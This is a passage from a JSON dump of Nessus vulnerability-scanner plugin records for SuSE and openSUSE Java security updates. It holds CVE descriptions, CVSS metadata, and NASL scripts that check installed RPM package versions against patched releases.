attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5354.html\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5360.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 5960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-demo-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-src-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, 
reference:\"java-1_5_0-ibm-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr9-2.4\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr9-2.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:18", "description": "This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. 
(CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. 
(CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. 
For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\nThis vulnerability cannot be exploited by an applet or Java Web Start\napplication.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. 
For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\n\nReferences can be found on :\n\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : IBM Java5 JRE and SDK (YOU Patch Number 12336)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12336.NASL", "href": "https://www.tenable.com/plugins/nessus/41268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41268);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", 
\"CVE-2008-5360\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java5 JRE and SDK (YOU Patch Number 12336)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. 
(CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. 
However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. 
(CVE-2008-5354)\n\nThis vulnerability cannot be exploited by an applet or Java Web Start\napplication.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. 
(CVE-2008-5342)\n\nReferences can be found on :\n\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5343.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5344.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5345.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5346.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5348.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5350.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5353.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5354.html\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5359.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5360.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12336.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava5-JRE-1.5.0-0.57\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"i586\", reference:\"IBMJava5-SDK-1.5.0-0.57\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava5-JRE-1.5.0-0.56\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"IBMJava5-SDK-1.5.0-0.56\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:10", "description": "The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. 
(CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-01-07T00:00:00", "title": "openSUSE 10 Security Update : java-1_6_0-sun (java-1_6_0-sun-5876)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-01-07T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun-debuginfo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun", "cpe:/o:novell:opensuse:10.3", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_JAVA-1_6_0-SUN-5876.NASL", "href": "https://www.tenable.com/plugins/nessus/35306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-5876.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35306);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", 
\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE 10 Security Update : java-1_6_0-sun (java-1_6_0-sun-5876)\");\n script_summary(english:\"Check for the java-1_6_0-sun-5876 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ 